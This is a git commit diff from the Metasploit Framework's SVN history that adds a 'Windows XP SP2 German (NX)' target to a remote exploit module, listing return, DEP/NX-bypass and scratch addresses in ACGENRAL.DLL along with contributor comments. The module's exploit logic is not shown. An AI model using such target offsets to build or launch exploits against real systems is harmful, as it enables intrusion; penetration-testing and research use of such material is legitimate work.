Add SP2 German

git-svn-id: file:///home/svn/framework3/trunk@5817 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-10-31 14:15:16 +00:00
parent d366e8342a
commit c5ad82fb68
1 changed files with 12 additions and 1 deletions

View File

@ -127,7 +127,18 @@ class Metasploit3 < Msf::Exploit::Remote
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, DEP/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3
# Target provided think.pink[at]gmx.de
#
[ 'Windows XP SP2 German (NX)',
{
'Ret' => 0x6fda2b0f,
'DisableNX' => 0x6fda16e2,
'Scratch' => 0x00020408,
}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
#
# Metasploit's NX bypass for XP SP2/SP3
# Target provided by sunwear <shellcoder[at]hotmail.com>